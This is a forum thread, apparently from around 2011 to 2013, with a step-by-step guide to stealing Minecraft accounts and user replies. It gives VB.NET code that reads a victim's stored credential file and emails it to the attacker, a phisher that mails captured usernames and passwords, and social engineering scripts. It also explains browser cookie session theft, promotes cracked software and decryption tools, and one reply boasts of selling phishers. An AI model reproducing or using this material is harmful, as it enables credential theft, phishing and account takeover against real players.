1
-Removed the videos. Don't plan on making more anytime soon.
-Removed space that was causing problems for so many. -_-
-Updated FAQ & other small edits.
-Adding a new section: Cookie Session Stealing. A truly original Minecraft hack I found.
-Minecraft Account Hacking - Part 3 was uploaded.
-Minecraft Account Hacking - Part 2 was uploaded.
-Version two of the video was uploaded.
-Just finished the video. Uploading now.
-The much needed FAQ section has been added.
-This guide is intended for windows users. It was specifically done on Windows 7. Updates to thread for Mac users are coming soon.
Hacking Minecraft accounts is something I have been perfecting for a while now. After a ton of experience and research I have narrowed down the most effective ways to "hack" a Minecraft account. This guide is good for either targeting someone or for just gathering alternate accounts. It is also the next best thing to using a account cracker. Lets begin.
Obtaining a "Lastlogin" File[/CENTER]
The key to stealing any Minecraft account is obtaining a file named "lastlogin". This file is located in the .minecraft folder which contains all of the games files.
If you don't have minecraft on your computer you will need to use the cracked version in the download. (You will find out why later.)
Method #1
The first way you can obtain a lastlogin file is to simply search it on the internet. Some people foolishly post their .minecraft folder on the internet for several reasons without removing their lastlogin file.
Some things you can search to find a .minecraft folder:
- Premodded Minecraft Folder
- Free .minecraft folder
- Play minecraft for free with this last loginfile
Method #2
The social engineering method. This method worked well for me. By befriending people on the you can convince them to send you their .minecraft folder by saying you will...
- Make incompatible mods work together
- Mod their .minecraft folder
- That you want to try out their modded .minecraft folder
- ect...
The great thing about this is that you don't even need the greatest social engineering skills. You only need to know what your talking about. So brush up on your info about the mechanics of the game.
Method #3
The last method is using a program that steals the file for you. Here is an example code that you may use.
VB.NET Example
Code:Imports System.Net.Mail Public Class Form1 Dim smtp As New SmtpClient Dim mail As New MailMessage Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() Try Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin") MyMailMessage.Attachments.Add(Attch) MyMailMessage.From = New MailAddress("Example@gmail.com") MyMailMessage.To.Add("Example@gmail.com") MyMailMessage.Subject = ("LastLoginFile") MyMailMessage.Body = (" ") Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential("Example@gmail.com", "Password") SMTP.Send(MyMailMessage) Catch ex As Exception End Try End Sub End Class
How to use the "lastlogin" file to steal their account
Mine Pass
Created by: Unknown
Now in the download you should see a cracked minecraft launcher. This will give you the game. Then go to download the original launcher so you can log in. It will be under "Download Minecraft". (If you already have the game you can skip this step.)
Now you need to take the "lastlogin" file you have and place it in your .minecraft folder. Which is located in in your %AppData% folder.
Now open up the non cracked launcher. You should see this:
(If not then the user was smart enough to leave it blank.)
Now open up Mine Pass in the download. Then click log in on the launcher. Mine Pass will do its job and show you this:
MC Last Login Decrypter (LLD)
Created by: Wertyl11
This is very simple just run the .jar and it will display the information. May not work for everyone.
Now you have the information you need to take the account for your self. If your lucky you can search the victims user name, find their email and take it.
Making an Effective Phisher
These ideas can be applied to Method #3 of Part 1.
This method requires that you know VB, or at least how to use a code given to you. This method, even though it's illegal, can be a effective. Yes its the infamous phisher.
When you make a phisher on the minecraft forums, or where ever, make it look real. Have tons of pictures and don't forget to add "why it may not work for every one". This way no suspicion comes about. Also make a second account and reply to your phishers thread saying it was great. This first post will be enough for many to download it and to fall for your trap. Lastly be creative. Think big! It doesn't have to work. Just has to look like it does.
Here is a code you can use:
Pass is what you would use for a text box.
Again this does require that you have some programming skills.Code:Imports System.Net.Mail Public Class Form1 Dim smtp As New SmtpClient Dim mail As New MailMessage Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Dim MyMailMessage As New MailMessage() Try MyMailMessage.From = New MailAddress("Your Gmail Here@gmail.com") MyMailMessage.To.Add("Your Gmail Here") MyMailMessage.Subject = User.Text MyMailMessage.Body = Pass.Text Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential("Your Gmail Here", "Your Gmail's Password Here") SMTP.Send(MyMailMessage) Pass.Text = "" Catch ex As Exception End Try End Sub
Minecraft Browser Session Stealing
The concept of session stealing with cookies is not a new one, but as far as minecraft goes this is new ground. I will be adding more as I discover more. For this the target must be logged into minecraft from their browser. This can be applied to other browsers, but today I will be showing you how to do it with Google Chrome.
From Target's Computer
- First make sure the target is logged in.
- Then go to the Chrome Web Store.
- Search and add the Extension "Edit This Cookie".
- Then go to minecraft.net where the target should still be logged in.
- Click on the cookie in the top right hand corner.
- Click export cookies. It will copy the cookies to your clip board.
- Now paste those cookies into a txt file on a flash drive, or email it to yourself.
- Now you need to be on your computer. Install that same extension into chrome.
- Now click the cookie and select import. Paste the cookies there.
- Now click Submit cookie changes.
You may need to refresh the page.- Now you should be logged into their account. Where you are free to play the game under their account.
Please Read:
If the person logs out of minecraft on their computer before you can login, then the cookies will be invalid.
FAQ
Technical FAQ
Can you hack an account for me MagicalMonkey? No.
Mine Pass just says it scanning and does nothing else. Why won't it work? You need to press log in.
Mine Pass does not display a password/username. Why? Because the owner of the account did not select remember password, or it is simply a blank last login file.
The account information I have does not work? Probably because the owner changed his information.
I get weird results with Mine Pass when I login. Why? I'll just say this. If you can't log into Minecraft with just the last log in file alone, then the file is no good and contains incorrect information.
I can not find my .minecraft folder. Why? Probably because Minecraft is not on your computer. So use the cracked launcher provided in the download in order to get a free copy.
Can I have the project folder for the Lastlogin file stealer/Phisher? No. I refuse to spoon feed any one. I have literally given you the entire code and all you need to do is copy and paste.
I can't find any last login files through a google search. Why not? I created this thread over a year ago just before the Minecraft Account Hacking Boom started. (Obviously, I have continued to update it quite often.) At the time there were less MC account hackers out there. So it was easier to find things like this. So the chances that you will find one laying around the internet any more is slim, but it doesn't mean it can't happen.
Irrelevant FAQ
MagicalMonkey, I don't like you, because you show people how to hack Minecraft accounts. Can you stop now!? No. lol
MagicalMonkey, I bet you're just a skid who copied all of this from someone else. Unlike a lot of very unintelligent people, I do not plagiarize other people's work. If I borrowed something from someone else, I posted it here.
Hey I think you are awesome. Is there anyway I can thank-you? Yeah! Let me know that I helped and share it with your friends. I would also like it if you thanked KronosCloud for making the MC ToolBox.
Is there a way I can contact you? Sure. You can PM me on NGU, or contact me on my twitter, @Magical_Monkey.
Downloads
Download the Minecraft Account Hackers Tool Kit .
Includes a cracked version of Minecraft, LLD and MinePass.
Minecraft Toolbox
By
Download the . It is basically all of the programs put into one tool. I highly suggest you try this first.
Direct Download Link:
Google Chrome will set off a false positive.
Virus Scan:
I hope you all enjoyed this and good luck. Do you want more? Do you want find a way to contact me? Take a look at my Twitter then. It is there for your benefit.
Do not contact me about sending you the link for the downloads. Register here at NGU to get all of the links, videos and downloads. It is free to sign up and it is a great community. If you do however try to contact me about getting the downloads without signing up for NGU I will ignore you. I get asked far too often and wanted to state this before it got out of hand.
Last edited by MagicalMonkey; 04-17-2013 at 08:23 AM.
Register or log in to view signatures.
CraigMurray95 (11-21-2011),CumGuzzler420(01-27-2012), Curiosity (09-17-2012), Curt (07-03-2012), IVisionsI (07-03-2012), Jake625 (06-21-2012), jobush50 (11-08-2011), LEzStarz (07-14-2012), mister_k (08-20-2012), Mr Grumpy (05-29-2012), Mr. Star (06-06-2012), Ninja (05-12-2012), Rasil23 (11-05-2011), Sloth (07-24-2012), Taylor (08-20-2012), wiseguy48 (11-03-2011), xChidori (05-27-2012), xFruitBurst (07-07-2012), xSoulEdge (05-06-2012), Ziom230 (07-09-2012)
This lastlogin information will be helpful in sharing some accounts with strangers.
Register or log in to view signatures.

For C# use
using System.Mail.Net;
MailMessage mail = new MailMessage("Email", "Email", Subject, "Message);
SmtpClient client = new SmtpClient("smtp.gmail.com");
client.Port = 587;
client.Credentials = new System.Net.NetworkCredential("Email", "Password");
client.EnableSsl = true;
client.Send(mail);
The Email Email is because the first one is for To and the second is for From so just set it the same so it appears as "My email" "Me"
Register or log in to view signatures.
Register or log in to view signatures.

I didn't add to this, this is just the simple send mail method for C# you will have to change it up a little to do what you want it to do but that is very simple.
Have it fetch a txt file and read it then send the text is a good example. Many possibilities with a basic method.
Register or log in to view signatures.
Register or log in to view signatures.

No problem. Like the main concept though. Should write something else, give me an idea to create.
I've created several phishers, ones that have literally tricked 2.5k+ people each into downloading, although I sell the phishers now rather than use them. :P 5 dollars a piece + support (incase it goes bad or something somehow).
Register or log in to view signatures.
Hope i win the weeks giveaway!, And thanks for posting this![]()
Register or log in to view signatures.
Register or log in to view signatures.
why don't you make a vb.net tool that automatically takes and send you the lastlogin by attaching it to the mail?
pm me if you need more info
Register or log in to view signatures.